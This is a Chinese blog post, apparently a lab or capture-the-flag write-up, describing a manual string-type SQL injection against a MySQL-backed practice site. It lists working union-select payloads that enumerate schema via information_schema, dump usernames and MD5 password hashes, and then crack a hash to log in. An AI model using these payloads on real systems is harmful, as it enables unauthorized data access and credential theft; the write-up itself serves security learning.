SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录

2021/7/16 19:08:15

本文主要是介绍SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

一进来看到一个停机公告,点开查看

发现链接中有字符参数,怀疑存在字符型注入

输入 ' and '1'='1 和 ' and '1'='2 测试是否存在注入 ' and '1'='1

' and '1'='2

发现当输入 'and '1'='2 时,网页发生了错误,确认存在注入。

通过order by 子句判断字段数

order by 1

order by 2

order by 5

order by 4

当order by 4 时网页正常响应,by 5时发生错误,说明存在4个字段。

判断回显位置。

通过union select 判断回显位置。

id=1' union select 1,2,3,4--+

回显位置为 2 和 3

爆当前数据库 id=1' union select 1,2,database(),4--+

得到数据库是 mozhe_discuz_stormgroup

爆表名 id=1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema like database()--+

得到数据表为 notice,stormgroup_member

爆列名 id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema like database() and table_name like 'stormgroup_member'--+

得到列名为 id,name,password,status

爆内容

爆出name,password,status的内容

id=1' union select 1,2,group_concat(name,',',password,',',status),4 from stormgroup_member--+

得到 name 为 mozhe , password 为 e804b0037bec0607a82e7be037e2e51d

password是个md5值,在md5在线解密网站上解密

密码为 196397

利用得到的账号密码登录

得到key mozhec2b968ab2172fe26c724b10d8b2



这篇关于SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程